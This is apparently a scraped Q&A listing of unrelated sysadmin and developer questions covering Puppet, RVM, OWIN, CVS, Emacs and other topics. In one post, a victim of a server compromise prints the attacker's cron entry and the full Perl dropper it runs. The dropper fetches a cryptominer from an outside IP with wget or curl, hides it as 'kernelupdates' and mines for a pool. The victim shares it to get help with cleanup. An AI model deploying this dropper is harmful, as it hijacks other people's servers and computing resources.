    I started with two clean machines this time. My master is running 12.04 Version: 2.7.11-1ubuntu2 Depends: ruby1.8, puppetmaster-common (= 2.7.11-1ubuntu2) My client is 10.04 Version: 2.6.3-0ubuntu1~lucid1 Depends: puppet-common (= 2.6.3-0ubuntu1~lucid1), ruby1.8 To setup Puppet tutorial: http://shapeshed.com/setting-up-puppet-on-ubuntu-10-04/ To connect master and client: http://shapeshed.com/connecting-clients-to-a-puppet-master/ The first time I tried to connect master to client failed with SSL_connect error. So I did rm -rf /etc/puppet/ssl/ to remove all the keys inside ssl folders. It looked like it work.... BUT client# puppet agent --server puppet --waitforce 60 --test /usr/lib/ruby/1.8/facter/util/resolution.rb:46: warning: Insecure world writable dir /etc/condor in PATH, mode 040777 /usr/lib/ruby/1.8/puppet/defaults.rb:67: warning: Insecure world writable dir /etc/condor in PATH, mode 040777 info: Creating a new SSL key for giab10 warning: peer certificate won't be verified in this SSL session info: Caching certificate for ca warning: peer certificate won't be verified in this SSL session warning: peer certificate won't be verified in this SSL session info: Creating a new SSL certificate request for mybox123 info: Certificate Request fingerprint (md5): XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX warning: peer certificate won't be verified in this SSL session warning: peer certificate won't be verified in this SSL session warning: peer certificate won't be verified in this SSL session warning: peer certificate won't be verified in this SSL session info: Caching certificate for mybox123 err: Could not retrieve catalog from remote server: SSL_connect returned=1 errno=0 state=SSLv3 read server certificate B: certificate verify failed warning: Not using cache on failed catalog It cached but then it couldn't retrieve it. Let me stop here.... worrying I would mess something up. But let's check master's status. * master is not running WoW.... ??? master# service puppetmaster start * Starting puppet master [OK] master# service puppetmaster status * master is not running I think time is sync. Well, we are behind a firewall so the port to sync time is disbaled. I checked with date and they seem okay. What about master not running? Is that the cause? Any help is appreciated. Thanks! /var/lib/puppet/log/masterhttp.log [2012-06-30 00:13:25] INFO WEBrick 1.3.1 [2012-06-30 00:13:25] INFO ruby 1.8.7 (2011-06-30) [x86_64-linux] [2012-06-30 00:13:25] WARN TCPServer Error: Address already in use - bind(2) [2012-06-30 00:19:40] INFO WEBrick 1.3.1 [2012-06-30 00:19:40] INFO ruby 1.8.7 (2011-06-30) [x86_64-linux] [2012-06-30 00:19:40] WARN TCPServer Error: Address already in use - bind(2) [2012-06-30 00:28:58] INFO WEBrick 1.3.1 [2012-06-30 00:28:58] INFO ruby 1.8.7 (2011-06-30) [x86_64-linux] [2012-06-30 00:28:58] WARN TCPServer Error: Address already in use - bind(2) [2012-06-30 15:31:25] INFO WEBrick 1.3.1 [2012-06-30 15:31:25] INFO ruby 1.8.7 (2011-06-30) [x86_64-linux] [2012-06-30 15:31:25] WARN TCPServer Error: Address already in use - bind(2) 1 S puppet 5186 1 0 80 0 - 29410 poll_s 15:44 ? 00:00:00 /usr/bin/ruby1.8 /usr/bin/puppet master --masterport=8140 4 S root 5235 5005 0 80 0 - 2344 pipe_w 15:45 pts/0 00:00:00 grep --color=auto puppet kill -9 5186 puppet master service puppetmaster status * master is not running I always have this error, but I always ignored it. http://pastebin.com/exbpArjv What could it mean? Time sync? Package not installed? Then how could we do puppetca in the first place?

    Read the article

  • multi-user rvm gem install failure when called from CloudFormation::Init

    - by Peter Mounce
    I've taken an Amazon Linux AMI (based on CentOS) and installed RVM (1.10.3) to it in multi-user fashion (see {1} below). I used that to install ruby 1.9.3-p125, rubygems 1.8.17, and bundler 1.1 as the baseline requirements for most things I'm going to be using the instances for. I've captured that instance to an AMI, and am now launching it via CloudFormation, with some CloudFormation::Init commands. One of them is to use s3cmd to pull down a private gem from S3, and the next one, the one that fails, is to install that gem. It fails with an error message 2012-03-15 16:53:20,201 [ERROR] Command 20_install_gems (/usr/local/rvm/rubies/ruby-1.9.3-p125/bin/gem install ./*.gem) failed 2012-03-15 16:53:20,202 [DEBUG] Command 20_install_gems output: /usr/local/rvm/rubies/ruby-1.9.3-p125/bin/gem:12:in `require': no such file to load -- rubygems (LoadError) from /usr/local/rvm/rubies/ruby-1.9.3-p125/bin/gem:12 Now, that happens during the cfn-init execution - I assume, but haven't checked yet, that cfn-init is being run with an environment different from that of ec2-user (there are no other users on the instance). If I run gem install mygem.gem in an interactive session then that works fine. So, my question really, is what should I do to make this work for cfn-init? Have I correctly set up rvm as multi-user? I've confirmed that cfn-init is being run as the root user, with his restricted environment. How should I source the /etc/profile.d/rvm.sh into root's sessions? {1} My semi-automated rvm installation steps (run in interactive session as ec2-user): sudo bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer ) sudo gpasswd -a ec2-user rvm # iconv-devel is baked into centos' glibc sudo yum install -y autoconf automake bison bzip2 gcc-c++ git libffi-devel libtool libxml2-devel libxslt-devel libyaml-devel make openssl-devel patch readline readline-devel zlib zlib-devel source /etc/profile.d/rvm.sh rvm list known # in a new session: rvm install ruby-1.9.3-p125 rvm use 1.9.3 --default gem update --system # gems required by public_web-awareness gem install aws-sdk bundler cocaine sinatra echo -e "gem: --no-ri --no-rdoc\n" > /home/ec2-user/.gemrc # delete unnecessary documentation files rm -rf `gem env gemdir`/doc sudo -s sudo echo -e "gem: --no-ri --no-rdoc\n" > /etc/skel/.gemrc sudo echo -e "gem: --no-ri --no-rdoc\n" > /etc/gemrc # ctrl + d out of the sudo session Some environment information: [ec2-user@ip ~]$ echo $PATH /usr/local/rvm/gems/ruby-1.9.3-p125/bin:/usr/local/rvm/gems/ruby-1.9.3-p125@global/bin:/usr/local/rvm/rubies/ruby-1.9.3-p125/bin:/usr/local/rvm/bin:/usr/local/bin:/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/sbin:/opt/aws/bin:/home/ec2-user/bin [ec2-user@ip ~]$ echo $GEM_HOME /usr/local/rvm/gems/ruby-1.9.3-p125 [ec2-user@ip ~]$ echo $GEM_PATH /usr/local/rvm/gems/ruby-1.9.3-p125:/usr/local/rvm/gems/ruby-1.9.3-p125@global [ec2-user@ip ~]$ echo $BUNDLE_PATH [ec2-user@ip ~]$ gem list *** LOCAL GEMS *** aws-sdk (1.3.6) bundler (1.1.0) cocaine (0.2.1) httparty (0.8.1) json (1.6.5) multi_json (1.1.0) multi_xml (0.4.1) nokogiri (1.5.1, 1.5.0) rack (1.4.1) rack-protection (1.2.0) rake (0.9.2) sinatra (1.3.2) tilt (1.3.3) uuidtools (2.1.2) yamler (0.1.0)

    Read the article

  • overriding new ubuntu installation

    - by tkoomzaaskz
    I've got a ubuntu 11.10 which has lost its support in May 2013, now I'd like to reintall up to the most up-to-date LTS, which is 12.04. My question is regarding my current partitions and doing backups. Is there a safe way to backup my data on some local partitions instead of copying files into DVDs/external drives (this is very uncormortable in my situation). Following are system commands shoing my disk: $ lsblk NAME MAJ:MIN RM SIZE RO MOUNTPOINT sda 8:0 0 232,9G 0 +-sda1 8:1 0 48,8G 0 +-sda2 8:2 0 63G 0 +-sda3 8:3 0 1K 0 +-sda4 8:4 0 53,7G 0 / +-sda5 8:5 0 18,6G 0 +-sda6 8:6 0 25,5G 0 +-sda7 8:7 0 23,3G 0 [SWAP] sr0 11:0 1 1024M 0 and $ sudo fdisk -l [sudo] password for xyz: Disk /dev/sda: 250.1 GB, 250059350016 bytes glowic: 255, sektorów/sciezke: 63, cylindrów: 30401, w sumie sektorów: 488397168 Jednostka = sektorów, czyli 1 * 512 = 512 bajtów Rozmiar sektora (logiczny/fizyczny) w bajtach: 512 / 512 Rozmiar we/wy (minimalny/optymalny) w bajtach: 512 / 512 Identyfikator dysku: 0xc3ffc3ff Device Boot Beginning End Blocks ID System /dev/sda1 * 2048 102402047 51200000 7 HPFS/NTFS/exFAT /dev/sda2 215044096 347080703 66018304 7 HPFS/NTFS/exFAT /dev/sda3 347082750 488392064 70654657+ 5 Extended /dev/sda4 102402048 215042047 56320000 83 Linux /dev/sda5 395905923 434975939 19535008+ 83 Linux /dev/sda6 434976003 488392064 26708031 83 Linux /dev/sda7 347082752 395905023 24411136 82 Linux swap / Solaris In the beginning I had Windows Vista pre-installed with the machine when it was bought (damn!) and I installed linux (the one I have now). The windows-program in master boot record has been overriden by grub and now I can boot with both Windows and Linux. This is list of mounted devices: $ mount /dev/sda4 on / type ext4 (rw,errors=remount-ro,commit=0) proc on /proc type proc (rw,noexec,nosuid,nodev) sysfs on /sys type sysfs (rw,noexec,nosuid,nodev) fusectl on /sys/fs/fuse/connections type fusectl (rw) none on /sys/kernel/debug type debugfs (rw) none on /sys/kernel/security type securityfs (rw) udev on /dev type devtmpfs (rw,mode=0755) devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620) tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755) none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880) none on /run/shm type tmpfs (rw,nosuid,nodev) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,noexec,nosuid,nodev) gvfs-fuse-daemon on /home/tomasz/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=tomasz) It's strange (I don't remember such thing) that my current linux uses only one partition (/dev/sda4). But, anyway, it seems like that. My final question is: am I able to use one of the existing linux partitions for a backup and install ubuntu 12.04 without removing neither windows nor ubuntu 11.04? I mean - will grub automatically accept both old windows vista and 2 linuxes (old 11.10 and "new" 12.04)? Is there any hidden operation done while installation that could harm my custom-backup-partition while installing? my fstab file: proc /proc proc nodev,noexec,nosuid 0 0 # / was on /dev/sda4 during installation UUID=d44e89f5-9da2-48eb-83b3-887652ec95d2 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda7 during installation UUID=bbe50535-ba57-434a-9272-211d859f0e00 none swap sw 0 0 sda5 and sda6 are trash partitions created during unsuccessful linux installation (this was linux installation before my current installation), I didn't delete these partitions, but I have access to them (and I can use them as backup partitions). edit: second question is: why does lsblk show /dev/sda having 232,9G while fdisk shows that it has 250.1GB? Where does the difference come from?

    Read the article

  • ./kernelupdates 100% cpu usage

    - by Vaibhav Panmand
    I have a CENTOS6 server running with some wordpress & tomcat websites. In the last two days it has been crashing continuously. After investigation we found that kernelupdates binary consuming 100% cpu on server. Process is mentioned below. ./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx But this process seems invalid kernel update. Might be server is compromised and this process is installed by hacker, So I've killed this process & removed apache user's cron entries. But somehow this process started again after couple of hours & cron entries also restored, I am searching for the thing which is modifying cron jobs. Does this process belong to a mining process? How can we stop cronjob modification and clean the source of this process? Cron entry (apache user) /6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc* abc.txt #!/usr/bin/perl system("killall -9 minerd"); system("killall -9 PWNEDa"); system("killall -9 PWNEDb"); system("killall -9 PWNEDc"); system("killall -9 PWNEDd"); system("killall -9 PWNEDe"); system("killall -9 PWNEDg"); system("killall -9 PWNEDm"); system("killall -9 minerd64"); system("killall -9 minerd32"); system("killall -9 named"); $rn=1; $ar=`uname -m`; while($rn==1 || $rn==0) { $rn=int(rand(11)); } $exists=`ls /tmp/.ice-unix`; $cratch=`ps aux | grep -v grep | grep kernelupdates`; if($cratch=~/kernelupdates/gi) { die; } if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) { $wig=`wget --version | grep GNU`; if(length($wig>6)) { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } else { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } } else { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } else { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } } } @prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382'); $prt=0; while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; } print "setup for $rn:$prt done :-)\n"; system("cd /tmp/.ice-unix;./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &"); print "done!\n"; Thanks in advance!

    Read the article

  • ASP.NET MVC tries to load older version of Owin assembly

    - by d_mcg
    As a bit of context, I'm developing an ASP.NET MVC 5 application that uses OAuth-based authentication via Microsoft's OWIN implementation, for Facebook and Google only at this stage. Currently (as of v3.0.0, git-commit 4932c2f), the FacebookAuthenticationOptions and GoogleOAuth2AuthenticationOptions don't provide any property to force Facebook nor Google respectively to reauthenticate users (via appending the appropriate query string parameters) when signing in. Initially, I set out to override the following classes: FacebookAuthenticationOptions GoogleOAuth2AuthenticationOptions FacebookAuthenticationHandler (specifically AuthenticateCoreAsync()) GoogleOAuth2AuthenticationHandler (specifically AuthenticateCoreAsync()) yet discovered that the ~AuthenticationHandler classes are marked as internal. So I pulled a copy of the source for the Katana project (http://katanaproject.codeplex.com/) and modified the source accordingly. After compiling, I found that there are several dependencies that needed updating in order to use these updated assemblies (Microsoft.Owin.Security.Facebook and Microsoft.Owin.Security.Google) in the MVC project: Microsoft.Owin Microsoft.Owin.Security Microsoft.Owin.Security.Cookies Microsoft.Owin.Security.OAuth Microsoft.Owin.Host.SystemWeb This was done by replacing the existing project references to the 3.0.0 versions and updating those in web.config. Good news: the project compiles successfully. In debugging, I received an exception on startup: An exception of type 'System.IO.FileLoadException' occurred in [MVC web assembly].dll but was not handled in user code Additional information: Could not load file or assembly 'Microsoft.Owin.Security, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. The located assembly's manifest definition does not match the assembly reference. (Exception from HRESULT: 0x80131040) The underlying exception indicated that Microsoft.AspNet.Identity.Owin was trying to load v2.1.0 of Microsoft.Owin.Security when calling app.UseExternalSignInCookie() from Startup.ConfigureAuth(IAppBuilder app) in Startup.Auth.cs. Unfortunately that assembly (and its other dependency, Microsoft.AspNet.Identity.Owin) aren't part of the Project Katana solution, and I can't find any accessible repository for these assemblies online. Are the Microsoft.AspNet.Identity assemblies open source, like the Katana project? Is there a way to fool those assemblies to use the referenced v3.0.0 assemblies instead of v2.1.0? The /bin folder contains the 3.0.0 versions of the Owin assemblies. I've upgraded the NuGet packages for Microsoft.AspNet.Identity.Owin, and this is still an issue. Any ideas on how to resolve this issue?

    Read the article

  • Wrapping malloc - C

    - by Appu
    I am a beginner in C. While reading git's source code, I found this wrapper function around malloc. void *xmalloc(size_t size) { void *ret = malloc(size); if (!ret && !size) ret = malloc(1); if (!ret) { release_pack_memory(size, -1); ret = malloc(size); if (!ret && !size) ret = malloc(1); if (!ret) die("Out of memory, malloc failed"); } #ifdef XMALLOC_POISON memset(ret, 0xA5, size); #endif return ret; } Questions I couldn't understand why are they using malloc(1)? What does release_pack_memory does and I can't find this functions implementation in the whole source code. What does the #ifdef XMALLOC_POISON memset(ret, 0xA5, size); does? I am planning to reuse this function on my project. Is this a good wrapper around malloc? Any help would be great.

    Read the article

  • recent cvs cygwin newline windows problems. How to solve?

    - by user72150
    Hi all, One of our projects still uses CVS. Recently (sometime in the past year) the Cygwin cvs client (currently using 1.12.13) has given me problems when I update. I suspect the problem stems from windows/unix newline differences. It worked for years without a problem. Here are the symptoms. When I update from the command line, I see messages like these: "no such repository" messages /cvshome : no such repository False-"Modified" due to newline differences M java/com/foo/ekm/value/EkmContainerInstance.java False-"Conflicts" cvs update: Updating java/com/foo/ekm/value/XWiki cvs update: move away `java/com/foo/ekm/value/XWiki/XWikiContainerInstance.java'; it is in the way C java/com/foo/ekm/value/XWiki/XWikiContainerInstance.java Note the for the 'no such repository' error, I found that cd-ing into the 'CVS/' folder and running 'dos2unix Root' updates correctly. I'm not sure how this file (or Repository or Entries) gets whacked. I don't remember when these problems started. I have a workaround: updating from our IDE (Intellij Idea) always succeeds Yes, I know we should switch to (svn|git|mercurial), but does anyone know what causes these problems? when they were introduced? workarounds? thanks, bill

    Read the article

  • emacs frustration with web development any working dot-files?

    - by Tony Cruise
    I really liked flexibility of emacs but it is really annoying to make it work. I want to use it for web development html, css, javascript, php. I first tried emacs-starter-kit . It didn't included nXhtml. Also C-g key binding does not work (they call it starter kit but basic key command does not work). I think it is mapped for git control. That's a frustration for a beginner. Then I replaced emacs-starter-kit with nXhtml. At least C-g is working. But code completion sucks, M-tab does not work. I tried code completion from nXhtml menu with no success. Also NXhtml mode did'nt colorized my file if css is mixed with html. Isn't it recommended for mixed html, css,php files. So why it doesnt work?. Why Emacs folks do not aware of convention over configuration? Dam! ship it something works! Please help me before I am getting crazy. I use Ubuntu 10.04 and emacs-snaphot-gtk 23.1.50-1. Please guide me step by step with your working dotfile url. Even I accept I am a dummy, it is really annoying and frustrating to use emacs.

    Read the article

  • Fail to load NPAPI plugin in Google Chrome on Mac OS X

    - by Roman
    I have been trying to get Google Chrome (6.0.401.1 dev) on Mac OS X to load an NPAPI plugin without success so far. I have been working around the npsimple example from here: http://git.webvm.net/?p=npsimple. Using gcc on Mac and VC++ 2008 on Windows I managed to get it running on Safari and Firefox on Mac OS X and Firefox and Google Chrome on Windows, but not on Google Chrome on Mac OS X. When trying to debug Google Chrome on Mac OS X it seemed Google Chrome was briefly dyld-loading (and immediately dyld-unloading) the plugin on startup, but without actually looking-up any symbols within the plugin or calling any of the functions. It seemed to be doing that for every plugin, though. Also, when loading a page with the embed-tag for the plugin, Google Chrome did not seem to even dyld-load the plugin and no functions were called (not even NP_GetEntryPoints). Google Chrome also does not output any error message, it just simply does not load the plugin. I am not sure I caught everything with gdb because of Google Chrome using different processes, but I have also tried all the switches like --no-sandbox, --single-process and --plugin-startup-dialog (which incidentally does not seem to work at all on Mac OS X). I also made sure the architecture of the binary matches (i.e. 32-bit for Google Chrome). Has anybody had similar problems before? Is there anything I am missing here, like a gcc switch when compiling or something? Any help would be greatly appreciated.

    Read the article

  • Converting from CVS to SVN to Hg, does 'hg convert' require pointing to an SVN checkout or just a re

    - by Terry
    As part of migrating full CVS history to Hg, I've used cvs2svn to create an SVN repo in a local directory. It's first level directory structure is: 2010-04-21 09:39 AM <DIR> . 2010-04-21 09:39 AM <DIR> .. 2010-04-21 09:39 AM <DIR> locks 2010-04-21 09:39 AM <DIR> hooks 2010-04-21 09:39 AM <DIR> conf 2010-04-21 09:39 AM 229 README.txt 2010-04-21 11:45 AM <DIR> db 2010-04-21 09:39 AM 2 format 2 File(s) 231 bytes After setting up hg and the convert extension and attempting the convert, I get the following on convert: C:\>hg convert file://localhost/Users/terry/Desktop/repoSVN assuming destination repoSVN-hg initializing destination repoSVN-hg repository file://localhost/Users/terry/Desktop/repoSVN does not look like a CVS checkout file://localhost/Users/terry/Desktop/repoSVN does not look like a Git repo file://localhost/Users/terry/Desktop/repoSVN does not look like a Subversion repo file://localhost/Users/terry/Desktop/repoSVN is not a local Mercurial repo file://localhost/Users/terry/Desktop/repoSVN does not look like a darcs repo file://localhost/Users/terry/Desktop/repoSVN does not look like a monotone repo file://localhost/Users/terry/Desktop/repoSVN does not look like a GNU Arch repo file://localhost/Users/terry/Desktop/repoSVN does not look like a Bazaar repo file://localhost/Users/terry/Desktop/repoSVN does not look like a P4 repo abort: file://localhost/Users/terry/Desktop/repoSVN: missing or unsupported repository I have TortoiseHg installed. For info, hg version reports: Mercurial Distributed SCM (version 1.4.3) This version of Mercurial seems to have some svn bindings if library.zip in the install is to be believed. Do I need to do a checkout and point hg convert to it for this to work properly?

    Read the article

  • error when running mysql2psql

    - by Mateo Acebedo
    I am trying to migrate a mysql database to a psql database, and after installing, I write the running command and instead of generationg the mysql2psql.yml file, this is what is being printed on my git bash window. $ mysql2psql c:/Ruby200/lib/ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45:in `require': c annot load such file -- 2.0/mysql_api (LoadError) from c:/Ruby200/lib/ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45:in `require' from c:/Ruby200/lib/ruby/gems/2.0.0/gems/mysql-2.8.1-x86-mingw32/lib/mys ql.rb:7:in `rescue in ' from c:/Ruby200/lib/ruby/gems/2.0.0/gems/mysql-2.8.1-x86-mingw32/lib/mys ql.rb:2:in `' from c:/Ruby200/lib/ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45:in `require' from c:/Ruby200/lib/ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45:in `require' from c:/Ruby200/lib/ruby/gems/2.0.0/gems/mysql2psql-0.1.0/lib/mysql2psql /mysql_reader.rb:1:in `' from c:/Ruby200/lib/ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45:in `require' from c:/Ruby200/lib/ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45:in `require' from c:/Ruby200/lib/ruby/gems/2.0.0/gems/mysql2psql-0.1.0/lib/mysql2psql .rb:5:in `' from c:/Ruby200/lib/ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45:in `require' from c:/Ruby200/lib/ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45:in `require' from c:/Ruby200/lib/ruby/gems/2.0.0/gems/mysql2psql-0.1.0/bin/mysql2psql :5:in `' from c:/Ruby200/bin/mysql2psql:23:in `load' from c:/Ruby200/bin/mysql2psql:23:in `' Any thoughts?

    Read the article

  • error with "pmem.c" compiling linux source code for android

    - by Preetam
    I am compiling linux source code for android emulator. When i execute make command(for building and cross-compiling the linux source) i get the following error "pmem.c" file. root@ubuntu:~/common# make CHK include/linux/version.h CHK include/linux/utsrelease.h SYMLINK include/asm - include/asm-x86 CALL scripts/checksyscalls.sh CHK include/linux/compile.h CC drivers/misc/pmem.o drivers/misc/pmem.c:441: error: conflicting types for ‘phys_mem_access_prot’ /home/preetam/common/arch/x86/include/asm/pgtable.h:383: note: previous declaration of ‘phys_mem_access_prot’ was here drivers/misc/pmem.c: In function ‘flush_pmem_file’: drivers/misc/pmem.c:805: error: implicit declaration of function ‘dmac_flush_range’ drivers/misc/pmem.c: In function ‘pmem_setup’: drivers/misc/pmem.c:1265: error: implicit declaration of function ‘ioremap_cached’ drivers/misc/pmem.c:1266: warning: assignment makes pointer from integer without a cast make[2]: * [drivers/misc/pmem.o] Error 1 make[1]: [drivers/misc] Error 2 make: ** [drivers] Error 2 root@ubuntu:~/common# how to resolve this error. It seems that there may some problems in the "pmem.c" file and i'll have to choose different git repository. but that would be a very complex thing, as now i have already done most of the things till here. I might have to see correct version of this file. please someone tell what should i do? how to solve this errors. please help..thankyou!

    Read the article

  • Fluent config not generating mapping files

    - by rboarman
    Hello, I am trying to get Fluent nHibernate to generate mappings so I can take a look at the files and the sql. My code is based on this post and on what I can glean from the documentation. http://stackoverflow.com/questions/1375146/fluent-mapping-entities-and-classmaps-in-different-assemblies I am using the latest code from git. Here’s my config code: Configuration cfg = new Configuration(); var ft = Fluently.Configure(cfg); //DbConnection by fluent ft.Database ( MsSqlConfiguration .MsSql2008 .ConnectionString("……") .ShowSql() .UseReflectionOptimizer() ); //get mapping files. ft.Mappings(m => { //set up the mapping locations m.FluentMappings.AddFromAssemblyOf<Entity>() .ExportTo(@"C:\temp"); m.Apply(cfg); }); I also tried: var sessionFactory = Fluently.Configure() .Database(MsSqlConfiguration .MsSql2008 .ShowSql() .ConnectionString(“……")) .Mappings(p => p.FluentMappings .AddFromAssemblyOf<Entity>() .ExportTo(@"c:\temp\")) .BuildSessionFactory(); I have verified that the connection string is correct. The issue is that no mapping files show up in the ExportTo folder and no sql code shows up in the output window or in the log file. No errors or exceptions are generated either. I have no idea where to go from here. Thank you in advance. Rick

    Read the article

  • rails + sheevaplug = rails home development server and more

    - by microspino
    Hello I'd like to build a "Rails Brick" using a Sheevaplug from Marvell (O.S. is Ubuntu out of the box but You can install other distributions on It). It will be a home server and a silent, low cost (99$) low energy development machine. I'd like to add rails RVM, lot of gems, git-based heroku like deployment, passenger + nginx. This way I could have a portable server with a complete development environment and maybe I could find a hosting company where I can co-locate a grid of this devices or I can sell It as a simple little server for 10 or less users offices, with some centralized rails services (I think to a CMS, a BLOG, a WIKI, calendar or whatever this little jewel could afford). The usb port could make It a print server too or a UMTS link to the web via HUAWEI like usb UMTS keys. Can you give me some hint about: Is this project a crazy-close-to-failure idea? Why? which gem would You include? which rails open source app would you suggest? I have already an Excito Bubba Server at home, I saw the TonidoPlug so It came up in my mind to build something similiar but Rails based (Bubba is PHP based, TonidoPlug I don't know but It does not seems a Rails thing).

    Read the article

< Previous Page | 136 137 138 139 140 141 142 143 144 145 146 147  | Next Page >